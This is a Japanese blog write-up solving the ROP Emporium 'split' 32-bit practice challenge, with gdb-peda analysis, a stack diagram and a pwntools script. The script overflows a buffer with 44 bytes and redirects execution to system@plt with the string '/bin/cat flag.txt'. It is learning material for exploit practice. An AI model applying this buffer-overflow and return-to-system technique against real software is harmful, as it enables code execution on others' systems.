ROP Emporium split (32bit) - Shirataki's Note

ROP Emporium

ROP Emporium
ROPの練習サイトです.
2020年7月に更新されていろいろ変わってるみたい.

split (32bit)

$ ./split32 
split by ROP Emporium
x86

Contriving a reason to ask user for data...
> aaaa
Thank you!

Exiting
$ ./split32 
split by ROP Emporium
x86

Contriving a reason to ask user for data...
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thank you!
Segmentation fault

gdbで解析していきます.

$ gdb ./split32
gdb-peda$ i func
All defined functions:

Non-debugging symbols:
0x08048374  _init
0x080483b0  read@plt
0x080483c0  printf@plt
0x080483d0  puts@plt
0x080483e0  system@plt
0x080483f0  __libc_start_main@plt
0x08048400  setvbuf@plt
0x08048410  memset@plt
0x08048420  __gmon_start__@plt
0x08048430  _start
0x08048470  _dl_relocate_static_pie
0x08048480  __x86.get_pc_thunk.bx
0x08048490  deregister_tm_clones
0x080484d0  register_tm_clones
0x08048510  __do_global_dtors_aux
0x08048540  frame_dummy
0x08048546  main
0x080485ad  pwnme
0x0804860c  usefulFunction
0x08048630  __libc_csu_init
0x08048690  __libc_c

usefulFunctionを見てみます.

gdb-peda$ disas usefulFunction 
Dump of assembler code for function usefulFunction:
   0x0804860c <+0>:     push   ebp
   0x0804860d <+1>:     mov    ebp,esp
   0x0804860f <+3>:     sub    esp,0x8
   0x08048612 <+6>:     sub    esp,0xc
   0x08048615 <+9>:     push   0x804870e
   0x0804861a <+14>:    call   0x80483e0 <system@plt>
   0x0804861f <+19>:    add    esp,0x10
   0x08048622 <+22>:    nop
   0x08048623 <+23>:    leave  
   0x08048624 <+24>:    ret    
End of assembler dump.
gdb-peda$ x/s 0x804870e
0x804870e:      "/bin/ls"

system("/bin/ls")するだけ.
他のシンボルを調べます.

gdb-peda$ i var
All defined variables:

Non-debugging symbols:
0x080486a8  _fp_hw
0x080486ac  _IO_stdin_used
0x08048718  __GNU_EH_FRAME_HDR
0x08048894  __FRAME_END__
0x08049f0c  __frame_dummy_init_array_entry
0x08049f0c  __init_array_start
0x08049f10  __do_global_dtors_aux_fini_array_entry
0x08049f10  __init_array_end
0x08049f14  _DYNAMIC
0x0804a000  _GLOBAL_OFFSET_TABLE_
0x0804a028  __data_start
0x0804a028  data_start
0x0804a02c  __dso_handle
0x0804a030  usefulString
0x0804a042  __bss_start
0x0804a042  _edata
0x0804a044  __TMC_END__
0x0804a044  stdout
0x0804a044  stdout@@GLIBC_2.0
0x0804a048  completed
0x0804a04c  _end

usefulStringを見てみます.

gdb-peda$ x/s 0x0804a030
0x804a030 <usefulString>:       "/bin/cat flag.txt"

使えそうな文字列です.
mainとpwnmeはret2winと同じ. pwnmeでバッファオーバーフローが起こる. offsetは44.
ということでリターンアドレスを書き換えてsystem("/bin/cat flag.txt")を実行します.

+--------------------+
|        AAAA        |
+--------------------+
|     system@plt     |
+--------------------+
|        BBBB        |
+--------------------+
|    usefulString    |
+--------------------+

(今回も必要ない気がするけど)スクリプトを書いた.

from pwn import *

p=process('./split32')
e=ELF('./split32')

plt_system=e.plt['system']
usefulString=e.symbols['usefulString']

payload=b'A'*44
payload+=p32(plt_system)
payload+=b'BBBB'
payload+=p32(usefulString)

p.recv()
p.sendline(payload)
print(p.recvall().decode())